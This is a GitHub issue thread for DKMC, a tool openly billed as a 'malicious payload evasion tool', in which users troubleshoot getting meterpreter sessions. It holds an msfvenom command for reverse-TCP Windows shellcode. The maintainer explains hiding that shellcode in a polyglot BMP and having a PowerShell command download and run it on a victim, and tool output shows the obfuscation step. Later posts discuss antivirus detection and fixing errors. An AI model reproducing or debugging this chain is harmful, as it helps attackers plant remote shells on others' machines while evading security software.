Mr-Un1k0d3r / DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

no meterpreter session

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hi man ,thanks for this update but i'm still not getting a meterpreter session:
first i generate a raw shellcode with msfvenom like that:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=6667 -t raw -o /root/Desktop/shellcode.bin

after that i've used your tool to get the right format of shellcode.
can you help me or put a small demo please ...thanks

Hi sparta3407,

Again this is not the final release of the tool thats why there is no yet. In a nutshell you have to use the (gen) module to generate a polyglot image that will contain your shellcode. Then you generate the powershell command to run on your victim using the (ps) module. The powershell will basically download your image remotely and execute it as shellcode on the target. You can use the (web) module to start the python web server and make your image available to download. There is only one issue with the code the (ps) module is not working as expected the base64 encoded command doesn't seems to be encoded properly. I'm currently working on the project and it's not completed yet. An official release should available pretty soon.

Thank you

ok man ,thanks for your useful replay...good luck with your tool.


everything seem work fine
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x51a189f8
[+] Shellcode size 0x14d (333) bytes
[+] Adding 3 bytes of padding
[+] Generating magic bytes 0xdb1f4342
[+] Final shellcode length is 0x19f (415) bytes
[+] New BMP header set to 0x424de95cc50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/home/ddos/Desktop/DKMC/output/output-1503313357.bmp)

But, no meterpreter session.

How did you executed the payload on the target host?


it work. but seem av detected it... :D

The image itself? can you provide more information

(shellcode)>>> run
[-] >>> /root/Desktop/dkmc not found

This error came how to fix it ? Anyone tell me ??

@parthi-219 It seems the application does not know where to find dkmc. Try creating the DKMC folder in /root/Desktop/dkmc and see if that works. If not you may have to modify the code slightly.